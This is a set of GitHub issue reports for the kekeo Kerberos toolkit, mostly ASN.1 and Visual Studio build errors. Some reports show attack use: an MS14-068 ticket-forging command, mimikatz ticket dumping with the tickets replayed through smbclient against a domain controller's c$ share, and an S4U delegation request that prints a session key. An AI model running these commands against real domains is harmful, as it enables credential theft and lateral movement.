i followed your instructions, downloading asn.1 tool and run the build commands:
C:\Users\guy\Desktop\kekeo\modules\asn1>set set ASN1C="C:\Program Files\OSS Nokalva\ossasn1\winx64.trial\11.3.0"

C:\Users\guy\Desktop\kekeo\modules\asn1>cd C:\Users\guy\Desktop\kekeo\modules\asn

C:\Users\guy\Desktop\kekeo\modules\asn1>%ASN1C%\bin\asn1.exe %ASN1C%\asn1dflt\asn1dflt.msx64.zp8 KerberosV5Spec2.asn KerberosV5-PK-INIT-SPEC.asn PKIX1Explicit88.asn PKINIT.asn MS-SFU-KILE.asn CredSSP.asn GSSAPI.asn SPNEGO.asn -noSampleCode -der -root -CStyleComments -externalName kekeo_asn1 -messageFormat msvc -verbose -headerFile kull_m_kerberos_oss_asn1_internal.h -soedFile kull_m_kerberos_oss_asn1_internal_x64.c
OSS ASN.1 Compiler Version 11.3
Copyright (C) 2023 OSS Nokalva, Inc. All rights reserved.

asn1 : C0556I: Reading configuration file C:\Program Files\OSS Nokalva\ossinfoctrial.

• COMPANY = "fire nation (Trial)"
• PRODUCT = "ASN.1/C"
• LICENSE = "87943Z"
• COMPILER = "YES"
• RUNTIME = "NODELOCKED"
• MACHINE_TYPE = "AMD64"
• OPERATING_SYSTEM = "Windows X64"
• PRODUCT = "ASN.1/C"
• LICENSE = "87943Z"
• COMPILER = "YES"
• RUNTIME = "NODELOCKED"
• MACHINE_TYPE = "Intel x86"
• OPERATING_SYSTEM = "Windows NT/Windows 9x"
  This product is licensed for use by "fire nation (Trial)", License "87943Z".

asn1 : C0284I: Syntax checking file 'C:\Program Files\OSS Nokalva\ossasn1\winx64.trial\11.3.0\asn1dflt\asn1dflt.msx64.zp8'.

asn1 : C0284I: Syntax checking file 'KerberosV5Spec2.asn'.

asn1 : C0284I: Syntax checking file 'KerberosV5-PK-INIT-SPEC.asn'.

asn1 : C0284I: Syntax checking file 'PKIX1Explicit88.asn'.

asn1 : C0284I: Syntax checking file 'PKINIT.asn'.

asn1 : C0284I: Syntax checking file 'MS-SFU-KILE.asn'.

asn1 : C0284I: Syntax checking file 'CredSSP.asn'.

asn1 : C0284I: Syntax checking file 'GSSAPI.asn'.

asn1 : C0284I: Syntax checking file 'SPNEGO.asn'.

asn1 : C0285I: Global checking abstract syntax.

KerberosV5-PK-INIT-SPEC.asn(33) : KerberosV5-PK-INIT-SPEC: warning A0073W: 'identified-organization', not 'org', is the standard identifier for 3.

asn1 : C0286I: Generating header file.

asn1 : C0287I: Generating control file.

asn1 : C1310I: No critical errors found, but message(s) were suppressed due to the compiler's default permissive mode. Compile with -noRelaxedMode to see all messages.

asn1 : C0245I: 118 warning messages suppressed, 0 informatory messages suppressed, 1 error message ignored.
To see the suppressed messages use the option -warningMessages.

asn1 : C0043I: 0 error messages, 1 warning message and 14 informatory messages issued.

i copied the libraries and i get 1915 errors:
Error (active) E0020 identifier "KULL_M_ASN1_KRB_CRED" is undefined kekeo\modules\codecs\ccache.h
Error (active) E0020 identifier "KULL_M_ASN1_EncKrbCredPart" is undefined kekeo\modules\codecs\ccache.h

The command is as follow :
ms14068.exe /domain:jack.com /sid:S-1-5-21-3324576149-827753317-1539464659 /user:zhangsan /rid:1110 /password:xxxxxxxxxx/ /aes256 /kdc:WIN-DMGEI4BMT3C.jack.com /ticket:zhangsan.kirbi

The following extra library should be installed before building Kekeo using Visual Studio 2013:
https://www.microsoft.com/en-us/download/details.aspx?id=40770

Is it worth updating the documentation?

what do you think, can this be helpful? :)
https://github.com/programa-stic/security-advisories/tree/master/ObjSys/CVE-2016-5080

KiRBikator fail with error "format not recognized" since mimikatz version "mimikatz 2.1 (x64) built on Jul 18 2016 00:36:23"

C:\mimikatz_trunk_2016.07.11\x64>kirbikator.exe ccache [email protected]

  .#####.   KiRBikator 1.1 (x86) built on Jan 17 2016 00:39:11
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)
  '#####'                                                     * * */

Destination : MIT Credential Cache (simple)
 < [email protected] (RFC KRB-CRED (#22))
 > Single file : [email protected]



D:\mimikatz_trunk_2016.07.18\x64>kirbikator.exe ccache [email protected]

  .#####.   KiRBikator 1.1 (x86) built on Jan 17 2016 00:39:11
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)
  '#####'                                                     * * */

Destination : MIT Credential Cache (simple)
 < [email protected] : format not recognized!

I'd try to use ASN.1 generate file.but get the error missing file
($kekeo)/modules/asn1/asn1dflt.msx64.zp8

I found that the file kull_m_kerberos_asn1.c and kull_m_kerberos_asn1.h already exists,
so using VS complie. But getting the error:

Cannot open include file: 'kull_m_kerberos_oss_asn1_internal.h': No such file or directory

Hello Benjamin,

I'm facing a weird bug while trying to replay a ticket, converted from kirby to ccache format, with linux smbclient.

The non-working approach

Here below are the different steps to reproduce and to see each step interesting stuff:

• Login with the (local) Administrator account on the DC:

  • Dump Kerberos tickets with mimikatz.exe "kerberos::list /export" "exit"
  • Convert the kirby ticket from kirby to ccache with kirbikator.exe ccache <ticket.kirby> (also tried ccaches). I name that generated ticket ticket_not_replayable.ccache.

• On your linux box (kali 2.0 in my case):

  • Load the ccache ticket by setting the KRB5CCNAME environment variable to the ticket path

  $ export KRB5CCNAME=/ticket_not_replayable.ccache
  

  • Verify that the ticket is loaded with klist

  $ klist
  Ticket cache: FILE:/ticket_not_replayable.ccache
  Default principal: [email protected]
  
  Valid starting     Expires            Service principal
  22/12/15 20:13:00  23/12/15 06:13:00  krbtgt/[email protected]
  renew until 23/12/15 20:12:57
  

  • Try to perform a smbclient request (note, the fqdn alias is defined in the /etc/hosts).

  $ smbclient -k //dc01.adyolo.swag/c$  -d 3
  lp_load_ex: refreshing parameters
  Initialising global parameters
  params.c:pm_process() - Processing configuration file "/etc/samba/smb.conf"
  Processing section "[global]"
  added interface eth0 ip=192.168.11.137 bcast=192.168.11.255 netmask=255.255.255.0
  Client started (version 4.1.17-Debian).
  resolve_lmhosts: Attempting lmhosts lookup for name dc01.adyolo.swag<0x20>
  resolve_lmhosts: Attempting lmhosts lookup for name dc01.adyolo.swag<0x20>
  resolve_wins: WINS server resolution selected and no WINS servers listed.
  resolve_hosts: Attempting host lookup for name dc01.adyolo.swag<0x20>
  Connecting to 192.168.11.136 at port 445
  Doing spnego session setup (blob length=120)
  got OID=1.3.6.1.4.1.311.2.2.30
  got OID=1.2.840.48018.1.2.2
  got OID=1.2.840.113554.1.2.2
  got OID=1.2.840.113554.1.2.2.3
  got OID=1.3.6.1.4.1.311.2.2.10
  got principal=not_defined_in_RFC4178@please_ignore
  cli_session_setup_spnego: using target hostname not SPNEGO principal
  cli_session_setup_spnego: guessed server principal=cifs/[email protected]
  Doing kerberos session setup
  ads_krb5_mk_req: krb5_cc_get_principal failed (Operation not permitted)
  cli_session_setup_kerberos: spnego_gen_krb5_negTokenInit failed: Operation not permitted
  SPNEGO login failed: Undetermined error
  session setup failed: NT_STATUS_UNSUCCESSFUL
  

  • It fails...with the following reason

  ads_krb5_mk_req: krb5_cc_get_principal failed (Operation not permitted)
  

  • Using the -l . option in smbclient gives you that details (file log.smbclient):

  [2015/12/22 21:35:00,  3] ../source3/libsmb/cliconnect.c:1818(cli_session_setup_spnego_send)
  got principal=not_defined_in_RFC4178@please_ignore
  [2015/12/22 21:35:00,  3] ../source3/libsmb/cliconnect.c:1687(cli_session_setup_get_principal)
  cli_session_setup_spnego: using target hostname not SPNEGO principal
  [2015/12/22 21:35:00,  3] ../source3/libsmb/cliconnect.c:1702(cli_session_setup_get_principal)
  cli_session_setup_spnego: guessed server principal=cifs/[email protected]
  [2015/12/22 21:35:00,  2] ../source3/libsmb/cliconnect.c:1312(cli_session_setup_kerberos_send)
  Doing kerberos session setup
  [2015/12/22 21:35:00,  3] ../lib/krb5_wrap/krb5_samba.c:499(ads_krb5_mk_req)
  ads_krb5_mk_req: krb5_cc_get_principal failed (Operation not permitted)
  [2015/12/22 21:35:00,  1] ../source3/libsmb/cliconnect.c:1331(cli_session_setup_kerberos_send)
  cli_session_setup_kerberos: spnego_gen_krb5_negTokenInit failed: Operation not permitted
  [2015/12/22 21:35:00,  3] ../source3/libsmb/cliconnect.c:2147(cli_session_setup_done_spnego)
  SPNEGO login failed: Undetermined error
  

  So basically it says that it cannot find any valid credential in the ticket...

The working approach

Well, let's see whether a more normal path to behave with smbclient leads to the same ending, that is to say, grab the TGT ticket by providing the login+password of the targeted user:

• Unset the KRB5CCNAME environment variable on your box $ unset $KRB5CCNAME

• Grab a TGT ticket with $ kinit [email protected] (don't forget to set some stuff in /etc/krb5.conf for the domain/realm). Type the password when asked.

• Perform a klist. Basically I kinda have the same as before, a tgt (I'll name it ticket_replayable.ccache)

  $ klist
  Ticket cache: FILE:/tmp/krb5cc_0
  Default principal: [email protected]
  
  Valid starting     Expires            Service principal
  22/12/15 21:47:22  23/12/15 07:47:22  krbtgt/[email protected]
  renew until 23/12/15 21:47:19
  

• Perform a smbclient request, it works.

$ smbclient -k //dc01.adyolo.swag/c$  -d 3
lp_load_ex: refreshing parameters
Initialising global parameters
params.c:pm_process() - Processing configuration file "/etc/samba/smb.conf"
Processing section "[global]"
added interface eth0 ip=192.168.11.137 bcast=192.168.11.255 netmask=255.255.255.0
Client started (version 4.1.17-Debian).
Connecting to 192.168.11.136 at port 445
Doing spnego session setup (blob length=120)
got OID=1.3.6.1.4.1.311.2.2.30
got OID=1.2.840.48018.1.2.2
got OID=1.2.840.113554.1.2.2
got OID=1.2.840.113554.1.2.2.3
got OID=1.3.6.1.4.1.311.2.2.10
got principal=not_defined_in_RFC4178@please_ignore
cli_session_setup_spnego: using target hostname not SPNEGO principal
cli_session_setup_spnego: guessed server principal=cifs/[email protected]
Doing kerberos session setup
ads_cleanup_expired_creds: Ticket in ccache[FILE:/tmp/krb5cc_0] expiration Wed, 23 Dec 2015 07:47:22 GMT
OS=[Windows Server 2012 R2 Datacenter Evaluation 9600] Server=[Windows Server 2012 R2 Datacenter Evaluation 6.3]
smb: \> ls
  $Recycle.Bin                      DHS        0  Sun Dec 20 19:08:26 2015
  Boot                              DHS        0  Tue Oct  1 01:02:40 2013

The i-tried-but-failed-to-debug approach

Finally, I tried to try to replay both of the tickets with impacket's smbclient implementation: it fails with both of them, stating the following:

• For ticket_not_replayable.ccache:

  $ python smbclient.py -k -debug 192.168.11.136
  Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies
  
  [+] Using Kerberos Cache: /ticket_not_replayable.ccache
  [+] No valid credentials found in cache. 
  [-] invalid principal syntax
  

• For ticket_replayable.ccache

  $ python smbclient.py -k -debug 192.168.11.136
  Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies
  
  [-] invalid principal syntax
  

  It seems that the extracted SPN does not match a (simple) regex. Weird.

Conclusions

1. Like markruss could have said: I don't get it, I don't know who's faulty (simply me, kirbikator, linux smbclient, impacket smbclient etc.)
2. It would be cool to manage to fix it as it is really useful for an attacker to be able to reuse tickets from his workstation
3. Both of the tickets are attached, for debugging purposes. tickets.zip

Cheers to anyone looking to help for fixing.

It seems that I have also encountered this problem and cannot be solved

error C2065: "TSRequest":undeclared identifier
error C2065: "GSSAPI_Token_PDU":undeclared identifier

#16

I am getting this error when running tsssp::list command

kekeo # tsssp::list
ERROR kuhl_m_tsssp_list ; RegOpenKeyEx: 0x00000002
[AllowDefaultCredentials]
RD Child Sessions -- vs-debug/localhost

[AllowDefCredentialsWhenNTLMOnly]
RD Child Sessions -- vs-debug/localhost

[ConcatenateDefaults_AllowDefault]
RD Child Sessions -- vs-debug/localhost

[ConcatenateDefaults_AllowDefNTLMOnly]
RD Child Sessions -- vs-debug/localhost

misc::convert ccache will create a ccaches file

misc::convert ccaches will create a ccache file

Should this be the opposite? (ccache creates .ccache, ccaches creates .cchases)

Hello Benjamin,
i have downloaded the trial license for ASN1/C for x64 kekeo use and followed the procedure to make the .h file:

c:\temp\kekeo\modules\asn1>set ASN1C="C:\Program Files\OSS Nokalva\ossasn1\winx64.trial\10.7.0"
c:\temp\kekeo\modules\asn1>%ASN1C%\bin\asn1.exe ^
More? %ASN1C%\asn1dflt\asn1dflt.msx64.zp8 ^
More? KerberosV5Spec2.asn KerberosV5-PK-INIT-SPEC.asn PKIX1Explicit88.asn PKINIT.asn MS-SFU-KILE.asn ^
More? -noSampleCode -der -root -CStyleComments -externalName kekeo_asn1 -messageFormat msvc -verbose ^
More? -headerFile kull_m_kerberos_oss_asn1_internal.h -soedFile kull_m_kerberos_oss_asn1_internal_x64.c
OSS ASN.1 Compiler Version 10.7
Copyright (C) 2019 OSS Nokalva, Inc. All rights reserved.

asn1 : C0556I: Reading configuration file C:\Program Files\OSS Nokalva\ossinfoctrial.

• COMPANY = "(Trial)"
• PRODUCT = "ASN.1/C"
• COMPILER = "YES"
• RUNTIME = "NODELOCKED"
• MACHINE_TYPE = "AMD64"
• OPERATING_SYSTEM = "Windows X64"
• PRODUCT = "ASN.1/C"
• COMPILER = "YES"
• RUNTIME = "NODELOCKED"
• MACHINE_TYPE = "Intel x86"
• OPERATING_SYSTEM = "Windows NT/Windows 9x"

asn1 : C0284I: Syntax checking file 'C:\Program Files\OSS Nokalva\ossasn1\winx64.trial\10.7.0\asn1dflt\asn1dflt.msx64.zp8'.

asn1 : C0284I: Syntax checking file 'KerberosV5Spec2.asn'.

asn1 : C0284I: Syntax checking file 'KerberosV5-PK-INIT-SPEC.asn'.

asn1 : C0284I: Syntax checking file 'PKIX1Explicit88.asn'.

asn1 : C0284I: Syntax checking file 'PKINIT.asn'.

asn1 : C0284I: Syntax checking file 'MS-SFU-KILE.asn'.

asn1 : C0285I: Global checking abstract syntax.

KerberosV5-PK-INIT-SPEC.asn(33) : KerberosV5-PK-INIT-SPEC: warning A0073W: 'identified-organization', not 'org', is the standard identifier for 3.

asn1 : C0286I: Generating header file.

asn1 : C0287I: Generating control file.

asn1 : C1310I: No critical errors found, but message(s) were suppressed due to the compiler's default permissive mode. Compile with -noRelaxedMode to see all messages.

asn1 : C0245I: 110 warning messages suppressed, 0 informatory messages suppressed, 1 error message ignored.
To see the suppressed messages use the option -warningMessages.

asn1 : C0043I: 0 error messages, 1 warning message and 11 informatory messages issued.

file generated: kull_m_kerberos_oss_asn1_internal.h

elsewhere once i load the project using VStudio 2017 i get this error once compiliing:

Severity Code Description Project File Line Suppression State
Error (active) E0020 identifier "GSSAPI_Token" is undefined kekeo C:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 321
Error (active) E0020 identifier "GSSAPI_Token_PDU" is undefined kekeo C:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 320
Error (active) E0020 identifier "gssapi_Token" is undefined kekeo C:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 321
Error (active) E0020 identifier "NegotiationToken_PDU" is undefined kekeo C:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 370
Error (active) E0020 identifier "NegotiationToken" is undefined kekeo C:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 371
Error (active) E0020 identifier "negotiationToken" is undefined kekeo C:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 371
Error (active) E0020 identifier "negTokenInit_chosen" is undefined kekeo C:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 375
Error (active) E0020 identifier "NegTokenInit_mechToken_present" is undefined kekeo C:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 377
Error C2220 warning treated as error - no 'object' file generated kekeo c:\temp\kekeo\kekeo\modules\kuhl_m_ntlm.c 703
Error C2065 'GSSAPI_Token_PDU': undeclared identifier kekeo c:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 320
Error C2065 'GSSAPI_Token': undeclared identifier kekeo c:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 321
Error C2065 'gssapi_Token': undeclared identifier kekeo c:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 321
Error C2106 '=': left operand must be l-value kekeo c:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 321
Error C2065 'gssapi_Token': undeclared identifier kekeo c:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 351
Error C2065 'gssapi_Token': undeclared identifier kekeo c:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 353
Error C2223 left of '->innerToken' must point to struct/union kekeo c:\temp\kekeo\kekeo\modules\kuhl_m_tgt.c 353

...

anything i do wrong or miss ?
thanks in advance

VS 2017
When i build project , catch error
Cannot open include file kull_m_kerberos_asn1_internal.h
How get this file ?

Hi.

I dumped some tickets and wanted to convert them to use in a Linux box, however the convert feature of kekeo does nothing. I call it and the output files are the same (no MD5 change) or no new files created. Is the feature broken? Or am I missing anything?

Thank you.

  kekeo # tgs::s4u /tgt:[email protected][email protected] /user:administrator /service:cifs/sphere.quentin.org /ptt
Ticket  : [email protected][email protected]
  [krb-cred]     S: krbtgt/QUENTIN.ORG @ QUENTIN.ORG
  [krb-cred]     E: [00000012] aes256_hmac
  [enc-krb-cred] P: user @ QUENTIN.ORG
  [enc-krb-cred] S: krbtgt/QUENTIN.ORG @ QUENTIN.ORG
  [enc-krb-cred] T: [21/05/2019 23:51:35 ; 22/05/2019 09:51:35] {R:28/05/2019 23:51:35}
  [enc-krb-cred] F: [40e10000] name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
  [enc-krb-cred] K: ENCRYPTION KEY 18 (aes256_hmac      ): 8ef924459b58faeb940ba1114b8cc1b97aee61eee7bf3377bcf1154a01549693
  [s4u2self]  administrator
[kdc] name: TORUS.QUENTIN.ORG (auto)
[kdc] addr: 10.10.45.174 (auto)
ERROR kull_m_kerberos_asn1_net_SendAndRecv ; Packet size + 4 != Kerberos Packet Size

Windows 2016 DC - Wireshark shows the packet correctly - a TGS REP of 166 bytes.